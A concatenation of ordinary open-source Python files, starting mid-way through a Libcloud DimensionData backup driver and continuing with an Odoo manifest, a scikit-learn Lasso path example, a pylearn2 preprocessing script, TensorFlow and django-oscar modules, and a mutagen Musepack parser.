:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
if extra is not None:
service_plan = extra.get('servicePlan', DEFAULT_BACKUP_PLAN)
else:
service_plan = DEFAULT_BACKUP_PLAN
request = ET.Element('ModifyBackup',
{'xmlns': BACKUP_NS})
request.set('servicePlan', service_plan)
server_id = self._target_to_target_address(target)
self.connection.request_with_orgId_api_1(
'server/%s/backup/modify' % (server_id),
method='POST',
data=ET.tostring(request)).object
if isinstance(target, BackupTarget):
target.extra = extra
else:
target = self.ex_get_target_by_id(server_id)
return target
def delete_target(self, target):
"""
Delete a backup target
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget` or ``str``
:rtype: ``bool``
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup?disable' % (server_id),
method='GET').object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def list_recovery_points(self, target, start_date=None, end_date=None):
"""
List the recovery points available for a target
:param target: Backup target to list recovery points for
:type target: Instance of :class:`BackupTarget`
:param start_date: The start date to show jobs between (optional)
:type start_date: :class:`datetime.datetime`
:param end_date: The end date to show jobs between (optional)
:type end_date: :class:`datetime.datetime``
:rtype: ``list`` of :class:`BackupTargetRecoveryPoint`
"""
raise NotImplementedError(
'list_recovery_points not implemented for this driver')
def recover_target(self, target, recovery_point, path=None):
"""
Recover a backup target to a recovery point
:param target: Backup target to recover
:type target: Instance of :class:`BackupTarget`
:param recovery_point: Backup target with the backup data
:type recovery_point: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target not implemented for this driver')
def recover_target_out_of_place(self, target, recovery_point,
recovery_target, path=None):
"""
Recover a backup target to a recovery point out-of-place
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param recovery_point: Backup target with the backup data
:type recovery_point: Instance of :class:`BackupTarget`
:param recovery_target: Backup target to recover the data to
:type recovery_target: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target_out_of_place not implemented for this driver')
def get_target_job(self, target, id):
"""
Get a specific backup job by ID
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param id: The ID of the backup job to get
:type id: ``str``
:rtype: :class:`BackupTargetJob`
"""
jobs = self.list_target_jobs(target)
return list(filter(lambda x: x.id == id, jobs))[0]
def list_target_jobs(self, target):
"""
List the backup jobs on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:rtype: ``list`` of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'list_target_jobs not implemented for this driver')
def create_target_job(self, target, extra=None):
"""
Create a new backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'create_target_job not implemented for this driver')
def resume_target_job(self, target, job):
"""
Resume a suspended backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to resume
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'resume_target_job not implemented for this driver')
def suspend_target_job(self, target, job):
"""
Suspend a running backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to suspend
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'suspend_target_job not implemented for this driver')
def cancel_target_job(self, job, ex_client=None, ex_target=None):
"""
Cancel a backup job on a target
:param job: Backup target job to cancel. If it is ``None``
ex_client and ex_target must be set
:type job: Instance of :class:`BackupTargetJob` or ``None``
:param ex_client: Client of the job to cancel.
Not necessary if job is specified.
DimensionData only has 1 job per client
:type ex_client: Instance of :class:`DimensionDataBackupClient`
or ``str``
:param ex_target: Target to cancel a job from.
Not necessary if job is specified.
:type ex_target: Instance of :class:`BackupTarget` or ``str``
:rtype: ``bool``
"""
if job is None:
if ex_client is None or ex_target is None:
raise ValueError("Either job or ex_client and "
"ex_target have to be set")
server_id = self._target_to_target_address(ex_target)
client_id = self._client_to_client_id(ex_client)
else:
server_id = job.target.address
client_id = job.extra['clientId']
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/%s?cancelJob' % (server_id,
client_id),
method='GET').object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def ex_get_target_by_id(self, id):
"""
Get a target by server id
:param id: The id of the target you want to get
:type id: ``str``
:rtype: :class:`BackupTarget`
"""
node = self.connection.request_with_orgId_api_2(
'server/server/%s' % id).object
return self._to_target(node)
def ex_add_client_to_target(self, target, client_type, storage_policy,
schedule_policy, trigger, email):
"""
Add a client to a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget` or ``str``
:param client_type: Client type to add to the target
:type client_type: Instance of :class:`DimensionDataBackupClientType`
or ``str``
:param storage_policy: The storage policy for the client
:type storage_policy: Instance of
:class:`DimensionDataBackupStoragePolicy`
or ``str``
:param schedule_policy: The schedule policy for the client
:type schedule_policy: Instance of
:class:`DimensionDataBackupSchedulePolicy`
or ``str``
:param trigger: The notify trigger for the client
:type trigger: ``str``
:param email: The notify email for the client
:type email: ``str``
:rtype: ``bool``
"""
server_id = self._target_to_target_address(target)
backup_elm = ET.Element('NewBackupClient',
{'xmlns': BACKUP_NS})
if isinstance(client_type, DimensionDataBackupClientType):
ET.SubElement(backup_elm, "type").text = client_type.type
else:
ET.SubElement(backup_elm, "type").text = client_type
if isinstance(storage_policy, DimensionDataBackupStoragePolicy):
ET.SubElement(backup_elm,
"storagePolicyName").text = storage_policy.name
else:
ET.SubElement(backup_elm,
"storagePolicyName").text = storage_policy
if isinstance(schedule_policy, DimensionDataBackupSchedulePolicy):
ET.SubElement(backup_elm,
"schedulePolicyName").text = schedule_policy.name
else:
ET.SubElement(backup_elm,
"schedulePolicyName").text = schedule_policy
alerting_elm = ET.SubElement(backup_elm, "alerting")
alerting_elm.set('trigger', trigger)
ET.SubElement(alerting_elm, "emailAddress").text = email
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client' % (server_id),
method='POST',
data=ET.tostring(backup_elm)).object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def ex_remove_client_from_target(self, target, backup_client):
"""
Removes a client from a backup target
:param target: The backup target to remove the client from
:type target: :class:`BackupTarget` or ``str``
:param backup_client: The backup client to remove
:type backup_client: :class:`DimensionDataBackupClient` or ``str``
:rtype: ``bool``
"""
server_id = self._target_to_target_address(target)
client_id = self._client_to_client_id(backup_client)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/%s?disable' % (server_id, client_id),
method='GET').object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def ex_get_backup_details_for_target(self, target):
"""
Returns a backup details object for a target
:param target: The backup target to get details for
:type target: :class:`BackupTarget` or ``str``
:rtype: :class:`DimensionDataBackupDetails`
"""
if not isinstance(target, BackupTarget):
target = self.ex_get_target_by_id(target)
if target is None:
return
response = self.connection.request_with_orgId_api_1(
'server/%s/backup' % (target.address),
method='GET').object
return self._to_backup_details(response, target)
def ex_list_available_client_types(self, target):
"""
Returns a list of available backup client types
:param target: The backup target to list available types for
:type target: :class:`BackupTarget` or ``str``
:rtype: ``list`` of :class:`DimensionDataBackupClientType`
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/type' % (server_id),
method='GET').object
return self._to_client_types(response)
def ex_list_available_storage_policies(self, target):
"""
Returns a list of available backup storage policies
:param target: The backup target to list available policies for
:type target: :class:`BackupTarget` or ``str``
:rtype: ``list`` of :class:`DimensionDataBackupStoragePolicy`
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/storagePolicy' % (server_id),
method='GET').object
return self._to_storage_policies(response)
def ex_list_available_schedule_policies(self, target):
"""
Returns a list of available backup schedule policies
:param target: The backup target to list available policies for
:type target: :class:`BackupTarget` or ``str``
:rtype: ``list`` of :class:`DimensionDataBackupSchedulePolicy`
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/schedulePolicy' % (server_id),
method='GET').object
return self._to_schedule_policies(response)
def _to_storage_policies(self, object):
elements = object.findall(fixxpath('storagePolicy', BACKUP_NS))
return [self._to_storage_policy(el) for el in elements]
def _to_storage_policy(self, element):
return DimensionDataBackupStoragePolicy(
retention_period=int(element.get('retentionPeriodInDays')),
name=element.get('name'),
secondary_location=element.get('secondaryLocation')
)
def _to_schedule_policies(self, object):
elements = object.findall(fixxpath('schedulePolicy', BACKUP_NS))
return [self._to_schedule_policy(el) for el in elements]
def _to_schedule_policy(self, element):
return DimensionDataBackupSchedulePolicy(
name=element.get('name'),
description=element.get('description')
)
def _to_client_types(self, object):
elements = object.findall(fixxpath('backupClientType', BACKUP_NS))
return [self._to_client_type(el) for el in elements]
def _to_client_type(self, element):
description = element.get('description')
if description is None:
description = findtext(element, 'description', BACKUP_NS)
return DimensionDataBackupClientType(
type=element.get('type'),
description=description,
is_file_system=bool(element.get('isFileSystem') == 'true')
)
def _to_backup_details(self, object, target):
return DimensionDataBackupDetails(
asset_id=object.get('assetId'),
service_plan=object.get('servicePlan'),
status=object.get('state'),
clients=self._to_clients(object, target)
)
def _to_clients(self, object, target):
elements = object.findall(fixxpath('backupClient', BACKUP_NS))
return [self._to_client(el, target) for el in elements]
def _to_client(self, element, target):
client_id = element.get('id')
return DimensionDataBackupClient(
id=client_id,
type=self._to_client_type(element),
status=element.get('status'),
schedule_policy=findtext(element, 'schedulePolicyName', BACKUP_NS),
storage_policy=findtext(element, 'storagePolicyName', BACKUP_NS),
download_url=findtext(element, 'downloadUrl', BACKUP_NS),
running_job=self._to_backup_job(element, target, client_id),
alert=self._to_alert(element)
)
def _to_alert(self, element):
alert = element.find(fixxpath('alerting', BACKUP_NS))
if alert is not None:
notify_list = [
email_addr.text for email_addr
in alert.findall(fixxpath('emailAddress', BACKUP_NS))
]
return DimensionDataBackupClientAlert(
trigger=element.get('trigger'),
notify_list=notify_list
)
return None
def _to_backup_job(self, element, target, client_id):
running_job = element.find(fixxpath('runningJob', BACKUP_NS))
if running_job is not None:
return BackupTargetJob(
id=running_job.get('id'),
status=running_job.get('status'),
progress=int(running_job.get('percentageComplete')),
driver=self.connection.driver,
target=target,
extra={'clientId': client_id}
)
return None
def _to_targets(self, object):
node_elements = object.findall(fixxpath('server', TYPES_URN))
return [self._to_target(el) for el in node_elements]
def _to_target(self, element):
backup = findall(element, 'backup', TYPES_URN)
if len(backup) == 0:
return
extra = {
'description': findtext(element, 'description', TYPES_URN),
'sourceImageId': findtext(element, 'sourceImageId', TYPES_URN),
'datacenterId': element.get('datacenterId'),
'deployedTime': findtext(element, 'createTime', TYPES_URN),
'servicePlan': backup[0].get('servicePlan')
}
n = BackupTarget(id=backup[0].get('assetId'),
name=findtext(element, 'name', TYPES_URN),
address=element.get('id'),
driver=self.connection.driver,
type=BackupTargetType.VIRTUAL,
extra=extra)
return n
@staticmethod
def _client_to_client_id(backup_client):
return dd_object_to_id(backup_client, DimensionDataBackupClient)
@staticmethod
def _target_to_target_address(target):
return dd_object_to_id(target, BackupTarget, id_value='address')
|
Drooids/odoo | refs/heads/8.0 | addons/hw_posbox_homepage/__openerp__.py | 313 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'PosBox Homepage',
'version': '1.0',
'category': 'Hardware Drivers',
'sequence': 6,
'website': 'https://www.odoo.com/page/point-of-sale',
'summary': 'A homepage for the PosBox',
'description': """
PosBox Homepage
===============
This module overrides the openerp web interface to display a simple
homepage that explains what the posbox is, shows its status,
and indicates where to find documentation.
If you activate this module, you won't be able to access the
regular openerp interface anymore.
""",
'author': 'OpenERP SA',
'depends': ['hw_proxy'],
'installable': False,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
chrsrds/scikit-learn | refs/heads/master | examples/linear_model/plot_lasso_coordinate_descent_path.py | 44 | """
=====================
Lasso and Elastic Net
=====================
Lasso and elastic net (L1 and L2 penalisation) implemented using
coordinate descent.
The coefficients can be forced to be positive.
"""
print(__doc__)
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# License: BSD 3 clause
from itertools import cycle
import numpy as np
import matplotlib.pyplot as plt
from sklearn.linear_model import lasso_path, enet_path
from sklearn import datasets
diabetes = datasets.load_diabetes()
X = diabetes.data
y = diabetes.target
X /= X.std(axis=0) # Standardize data (easier to set the l1_ratio parameter)
# Compute paths
eps = 5e-3  # the smaller it is, the longer the path
print("Computing regularization path using the lasso...")
alphas_lasso, coefs_lasso, _ = lasso_path(X, y, eps, fit_intercept=False)
print("Computing regularization path using the positive lasso...")
alphas_positive_lasso, coefs_positive_lasso, _ = lasso_path(
X, y, eps, positive=True, fit_intercept=False)
print("Computing regularization path using the elastic net...")
alphas_enet, coefs_enet, _ = enet_path(
X, y, eps=eps, l1_ratio=0.8, fit_intercept=False)
print("Computing regularization path using the positive elastic net...")
alphas_positive_enet, coefs_positive_enet, _ = enet_path(
X, y, eps=eps, l1_ratio=0.8, positive=True, fit_intercept=False)
# Display results
plt.figure(1)
colors = cycle(['b', 'r', 'g', 'c', 'k'])
neg_log_alphas_lasso = -np.log10(alphas_lasso)
neg_log_alphas_enet = -np.log10(alphas_enet)
for coef_l, coef_e, c in zip(coefs_lasso, coefs_enet, colors):
l1 = plt.plot(neg_log_alphas_lasso, coef_l, c=c)
l2 = plt.plot(neg_log_alphas_enet, coef_e, linestyle='--', c=c)
plt.xlabel('-Log(alpha)')
plt.ylabel('coefficients')
plt.title('Lasso and Elastic-Net Paths')
plt.legend((l1[-1], l2[-1]), ('Lasso', 'Elastic-Net'), loc='lower left')
plt.axis('tight')
plt.figure(2)
neg_log_alphas_positive_lasso = -np.log10(alphas_positive_lasso)
for coef_l, coef_pl, c in zip(coefs_lasso, coefs_positive_lasso, colors):
l1 = plt.plot(neg_log_alphas_lasso, coef_l, c=c)
l2 = plt.plot(neg_log_alphas_positive_lasso, coef_pl, linestyle='--', c=c)
plt.xlabel('-Log(alpha)')
plt.ylabel('coefficients')
plt.title('Lasso and positive Lasso')
plt.legend((l1[-1], l2[-1]), ('Lasso', 'positive Lasso'), loc='lower left')
plt.axis('tight')
plt.figure(3)
neg_log_alphas_positive_enet = -np.log10(alphas_positive_enet)
for (coef_e, coef_pe, c) in zip(coefs_enet, coefs_positive_enet, colors):
l1 = plt.plot(neg_log_alphas_enet, coef_e, c=c)
l2 = plt.plot(neg_log_alphas_positive_enet, coef_pe, linestyle='--', c=c)
plt.xlabel('-Log(alpha)')
plt.ylabel('coefficients')
plt.title('Elastic-Net and positive Elastic-Net')
plt.legend((l1[-1], l2[-1]), ('Elastic-Net', 'positive Elastic-Net'),
loc='lower left')
plt.axis('tight')
plt.show()
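The solid and dashed paths above come from coordinate-descent solvers; the core per-coefficient update inside such solvers is soft thresholding. A minimal NumPy sketch of that operator (an illustration of the idea, not scikit-learn's implementation):

```python
import numpy as np

def soft_threshold(x, alpha):
    """Proximal operator of alpha * |x|: shrink each value toward zero by alpha."""
    return np.sign(x) * np.maximum(np.abs(x) - alpha, 0.0)

# A larger alpha drives more coefficients exactly to zero, which is why
# the paths above collapse to zero as -log10(alpha) decreases.
coefs = np.array([3.0, -0.5, 1.2])
shrunk = soft_threshold(coefs, 1.0)
```

Sweeping alpha over a log-spaced grid and re-solving, warm-started at each point, is essentially what `lasso_path` does internally.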
|
fyffyt/pylearn2 | refs/heads/master | pylearn2/scripts/datasets/make_cifar100_patches.py | 41 | """
This script makes a dataset of two million approximately whitened patches,
extracted uniformly at random from the CIFAR-100 train dataset.
This script is intended to reproduce the preprocessing used by Adam Coates
et al. in their work from the first half of 2011 on the CIFAR-10 and
STL-10 datasets.
"""
from __future__ import print_function
from pylearn2.utils import serial
from pylearn2.datasets import preprocessing
from pylearn2.datasets.cifar100 import CIFAR100
from pylearn2.utils import string_utils
import textwrap
def main():
data_dir = string_utils.preprocess('${PYLEARN2_DATA_PATH}')
print('Loading CIFAR-100 train dataset...')
data = CIFAR100(which_set='train')
print("Preparing output directory...")
patch_dir = data_dir + '/cifar100/cifar100_patches'
serial.mkdir(patch_dir)
README = open(patch_dir + '/README', 'w')
README.write(textwrap.dedent("""
The .pkl files in this directory may be opened in python using
cPickle, pickle, or pylearn2.serial.load.
data.pkl contains a pylearn2 Dataset object defining an unlabeled
dataset of 2 million 6x6 approximately whitened, contrast-normalized
patches drawn uniformly at random from the CIFAR-100 train set.
preprocessor.pkl contains a pylearn2 Pipeline object that was used
to extract the patches and approximately whiten / contrast normalize
them. This object is necessary when extracting features for
supervised learning or test set classification, because the
extracted features must be computed using inputs that have been
whitened with the ZCA matrix learned and stored by this Pipeline.
They were created with the pylearn2 script make_cifar100_patches.py.
All other files in this directory, including this README, were
created by the same script and are necessary for the other files
to function correctly.
"""))
README.close()
print("Preprocessing the data...")
pipeline = preprocessing.Pipeline()
pipeline.items.append(preprocessing.ExtractPatches(patch_shape=(6, 6),
num_patches=2*1000*1000))
pipeline.items.append(
preprocessing.GlobalContrastNormalization(sqrt_bias=10., use_std=True))
pipeline.items.append(preprocessing.ZCA())
data.apply_preprocessor(preprocessor=pipeline, can_fit=True)
data.use_design_loc(patch_dir + '/data.npy')
serial.save(patch_dir + '/data.pkl', data)
serial.save(patch_dir + '/preprocessor.pkl', pipeline)
if __name__ == "__main__":
main()
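The pipeline above fits stateful preprocessors (such as ZCA) on the data as it applies them, controlled by `can_fit`. A minimal sketch of that same pattern with a hypothetical step class (not pylearn2's API):

```python
import numpy as np

class MeanSubtract:
    """Stateful step: learns the column means on first use, then reuses them."""
    def __init__(self):
        self.mean_ = None

    def apply(self, X, can_fit):
        if can_fit:
            self.mean_ = X.mean(axis=0)
        return X - self.mean_

class Pipeline:
    """Apply each step in order, threading the transformed data through."""
    def __init__(self, items):
        self.items = items

    def apply(self, X, can_fit=False):
        for item in self.items:
            X = item.apply(X, can_fit)
        return X

pipeline = Pipeline([MeanSubtract()])
train = np.array([[1.0, 2.0], [3.0, 4.0]])
out = pipeline.apply(train, can_fit=True)   # fits the step on the train data
test_out = pipeline.apply(train + 1.0)      # reuses the fitted means
```

Saving the fitted pipeline alongside the data, as the script does with `preprocessor.pkl`, is what makes the same whitening reproducible at feature-extraction and test time.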
|
aselle/tensorflow | refs/heads/master | tensorflow/python/ops/losses/losses.py | 60 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Loss operations for use in neural networks.
Note: All the losses are added to the `GraphKeys.LOSSES` collection by default.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import
from tensorflow.python.ops.losses.losses_impl import *
from tensorflow.python.ops.losses.util import *
# pylint: enable=wildcard-import
|
itbabu/django-oscar | refs/heads/master | tests/integration/offer/post_order_action_tests.py | 21 | from decimal import Decimal as D
from django.test import TestCase
from oscar.apps.offer import models, utils, custom
from oscar.test import factories
from oscar.test.basket import add_product
class CustomAction(models.Benefit):
class Meta:
proxy = True
app_label = 'tests'
def apply(self, basket, condition, offer):
condition.consume_items(offer, basket, ())
return models.PostOrderAction(
"Something will happen")
def apply_deferred(self, basket, order, application):
return "Something happened"
@property
def description(self):
return "Will do something"
def create_offer():
range = models.Range.objects.create(
name="All products", includes_all_products=True)
condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=1)
benefit = custom.create_benefit(CustomAction)
return models.ConditionalOffer.objects.create(
condition=condition,
benefit=benefit,
offer_type=models.ConditionalOffer.SITE)
class TestAnOfferWithAPostOrderAction(TestCase):
def setUp(self):
self.basket = factories.create_basket(empty=True)
add_product(self.basket, D('12.00'), 1)
create_offer()
utils.Applicator().apply(self.basket)
def test_applies_correctly_to_basket_which_meets_condition(self):
self.assertEqual(1, len(self.basket.offer_applications))
self.assertEqual(
1, len(self.basket.offer_applications.post_order_actions))
action = self.basket.offer_applications.post_order_actions[0]
self.assertEqual('Something will happen', action['description'])
def test_has_discount_recorded_correctly_when_order_is_placed(self):
order = factories.create_order(basket=self.basket)
discounts = order.discounts.all()
self.assertEqual(1, len(discounts))
self.assertEqual(1, len(order.post_order_actions))
discount = discounts[0]
self.assertTrue(discount.is_post_order_action)
self.assertEqual(D('0.00'), discount.amount)
self.assertEqual('Something happened', discount.message)
|
gylian/headphones | refs/heads/master | lib/mutagen/musepack.py | 16 | # A Musepack reader/tagger
#
# Copyright 2006 Lukas Lalinsky <lalinsky@gmail.com>
# Copyright 2012 Christoph Reiter <christoph.reiter@gmx.at>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
"""Musepack audio streams with APEv2 tags.
Musepack is an audio format originally based on the MPEG-1 Layer-2
algorithms. Stream versions 4 through 7 are supported.
For more information, see http://www.musepack.net/.
"""
__all__ = ["Musepack", "Open", "delete"]
import struct
from mutagen.apev2 import APEv2File, error, delete
from mutagen.id3 import BitPaddedInt
from mutagen._util import cdata
class MusepackHeaderError(error):
pass
RATES = [44100, 48000, 37800, 32000]
def _parse_sv8_int(fileobj, limit=9):
"""Reads (max limit) bytes from fileobj until the MSB is zero.
    The low 7 bits of each byte are merged into a big-endian uint.
    Raises ValueError if no byte with a zero MSB is found within
    limit bytes, or EOFError if the file ends before then.
Returns (parsed number, number of bytes read)
"""
num = 0
for i in xrange(limit):
c = fileobj.read(1)
if len(c) != 1:
raise EOFError
num = (num << 7) | (ord(c) & 0x7F)
if not ord(c) & 0x80:
return num, i + 1
if limit > 0:
raise ValueError
return 0, 0
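The same 7-bits-per-byte decoding can be sketched standalone (Python 3 byte indexing, with `io.BytesIO` standing in for a real file object):

```python
import io

def parse_varint(fileobj, limit=9):
    """Read bytes until one has its MSB clear; merge the low 7 bits big-endian."""
    num = 0
    for i in range(limit):
        c = fileobj.read(1)
        if len(c) != 1:
            raise EOFError
        num = (num << 7) | (c[0] & 0x7F)
        if not c[0] & 0x80:
            return num, i + 1
    if limit > 0:
        raise ValueError
    return 0, 0

# 0x81 0x05: a continuation byte carrying 1, then a final byte carrying 5,
# giving (1 << 7) | 5 and a length of two bytes.
value, nbytes = parse_varint(io.BytesIO(b"\x81\x05"))
```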
def _calc_sv8_gain(gain):
# 64.82 taken from mpcdec
return 64.82 - gain / 256.0
def _calc_sv8_peak(peak):
return (10 ** (peak / (256.0 * 20.0)) / 65535.0)
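Restating the two conversions above as a quick check: the gain field is stored in 1/256 dB steps below the 64.82 dB reference taken from mpcdec, and the peak field is a dB-scaled amplitude mapped back into the [0..1] range.

```python
def sv8_gain(gain):
    # stored in 1/256 dB relative to the 64.82 dB reference from mpcdec
    return 64.82 - gain / 256.0

def sv8_peak(peak):
    # stored as 256 * 20 * log10(peak * 65535); invert back to an amplitude
    return 10 ** (peak / (256.0 * 20.0)) / 65535.0

reference_gain = sv8_gain(0)   # a stored gain of 0 means no adjustment
smallest_peak = sv8_peak(0)    # a stored peak of 0 decodes to 1/65535
```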
class MusepackInfo(object):
"""Musepack stream information.
Attributes:
* channels -- number of audio channels
* length -- file length in seconds, as a float
* sample_rate -- audio sampling rate in Hz
* bitrate -- audio bitrate, in bits per second
* version -- Musepack stream version
Optional Attributes:
* title_gain, title_peak -- Replay Gain and peak data for this song
* album_gain, album_peak -- Replay Gain and peak data for this album
These attributes are only available in stream version 7/8. The
gains are a float, +/- some dB. The peaks are a percentage [0..1] of
the maximum amplitude. This means to get a number comparable to
VorbisGain, you must multiply the peak by 2.
"""
def __init__(self, fileobj):
header = fileobj.read(4)
if len(header) != 4:
raise MusepackHeaderError("not a Musepack file")
# Skip ID3v2 tags
if header[:3] == "ID3":
header = fileobj.read(6)
if len(header) != 6:
raise MusepackHeaderError("not a Musepack file")
size = 10 + BitPaddedInt(header[2:6])
fileobj.seek(size)
header = fileobj.read(4)
if len(header) != 4:
raise MusepackHeaderError("not a Musepack file")
if header.startswith("MPCK"):
self.__parse_sv8(fileobj)
else:
self.__parse_sv467(fileobj)
if not self.bitrate and self.length != 0:
fileobj.seek(0, 2)
self.bitrate = int(round(fileobj.tell() * 8 / self.length))
def __parse_sv8(self, fileobj):
#SV8 http://trac.musepack.net/trac/wiki/SV8Specification
key_size = 2
mandatory_packets = ["SH", "RG"]
        def check_frame_key(key):
            if len(key) != key_size or not 'AA' <= key <= 'ZZ':
                raise MusepackHeaderError("Invalid frame key.")
frame_type = fileobj.read(key_size)
check_frame_key(frame_type)
while frame_type not in ("AP", "SE") and mandatory_packets:
try:
frame_size, slen = _parse_sv8_int(fileobj)
except (EOFError, ValueError):
raise MusepackHeaderError("Invalid packet size.")
data_size = frame_size - key_size - slen
if frame_type == "SH":
mandatory_packets.remove(frame_type)
self.__parse_stream_header(fileobj, data_size)
elif frame_type == "RG":
mandatory_packets.remove(frame_type)
self.__parse_replaygain_packet(fileobj, data_size)
else:
fileobj.seek(data_size, 1)
frame_type = fileobj.read(key_size)
check_frame_key(frame_type)
if mandatory_packets:
raise MusepackHeaderError("Missing mandatory packets: %s."
% ", ".join(mandatory_packets))
self.length = float(self.samples) / self.sample_rate
self.bitrate = 0
def __parse_stream_header(self, fileobj, data_size):
fileobj.seek(4, 1)
try:
self.version = ord(fileobj.read(1))
except TypeError:
raise MusepackHeaderError("SH packet ended unexpectedly.")
try:
samples, l1 = _parse_sv8_int(fileobj)
samples_skip, l2 = _parse_sv8_int(fileobj)
except (EOFError, ValueError):
raise MusepackHeaderError(
"SH packet: Invalid sample counts.")
left_size = data_size - 5 - l1 - l2
if left_size != 2:
raise MusepackHeaderError("Invalid SH packet size.")
data = fileobj.read(left_size)
if len(data) != left_size:
raise MusepackHeaderError("SH packet ended unexpectedly.")
self.sample_rate = RATES[ord(data[-2]) >> 5]
self.channels = (ord(data[-1]) >> 4) + 1
self.samples = samples - samples_skip
def __parse_replaygain_packet(self, fileobj, data_size):
data = fileobj.read(data_size)
if data_size != 9:
raise MusepackHeaderError("Invalid RG packet size.")
if len(data) != data_size:
raise MusepackHeaderError("RG packet ended unexpectedly.")
title_gain = cdata.short_be(data[1:3])
title_peak = cdata.short_be(data[3:5])
album_gain = cdata.short_be(data[5:7])
album_peak = cdata.short_be(data[7:9])
if title_gain:
self.title_gain = _calc_sv8_gain(title_gain)
if title_peak:
self.title_peak = _calc_sv8_peak(title_peak)
if album_gain:
self.album_gain = _calc_sv8_gain(album_gain)
if album_peak:
self.album_peak = _calc_sv8_peak(album_peak)
def __parse_sv467(self, fileobj):
fileobj.seek(-4, 1)
header = fileobj.read(32)
if len(header) != 32:
raise MusepackHeaderError("not a Musepack file")
# SV7
if header.startswith("MP+"):
self.version = ord(header[3]) & 0xF
if self.version < 7:
raise MusepackHeaderError("not a Musepack file")
frames = cdata.uint_le(header[4:8])
flags = cdata.uint_le(header[8:12])
self.title_peak, self.title_gain = struct.unpack(
"<Hh", header[12:16])
self.album_peak, self.album_gain = struct.unpack(
"<Hh", header[16:20])
self.title_gain /= 100.0
self.album_gain /= 100.0
self.title_peak /= 65535.0
self.album_peak /= 65535.0
self.sample_rate = RATES[(flags >> 16) & 0x0003]
self.bitrate = 0
# SV4-SV6
else:
header_dword = cdata.uint_le(header[0:4])
self.version = (header_dword >> 11) & 0x03FF
if self.version < 4 or self.version > 6:
raise MusepackHeaderError("not a Musepack file")
self.bitrate = (header_dword >> 23) & 0x01FF
self.sample_rate = 44100
if self.version >= 5:
frames = cdata.uint_le(header[4:8])
else:
frames = cdata.ushort_le(header[6:8])
if self.version < 6:
frames -= 1
self.channels = 2
self.length = float(frames * 1152 - 576) / self.sample_rate
def pprint(self):
rg_data = []
if hasattr(self, "title_gain"):
rg_data.append("%+0.2f (title)" % self.title_gain)
if hasattr(self, "album_gain"):
rg_data.append("%+0.2f (album)" % self.album_gain)
rg_data = (rg_data and ", Gain: " + ", ".join(rg_data)) or ""
return "Musepack SV%d, %.2f seconds, %d Hz, %d bps%s" % (
self.version, self.length, self.sample_rate, self.bitrate, rg_data)
class Musepack(APEv2File):
_Info = MusepackInfo
_mimes = ["audio/x-musepack", "audio/x-mpc"]
@staticmethod
def score(filename, fileobj, header):
return (header.startswith("MP+") + header.startswith("MPCK") +
filename.lower().endswith(".mpc"))
Open = Musepack
|
harlowja/urwid | refs/heads/master | urwid/tests/test_canvas.py | 23 | import unittest
from urwid import canvas
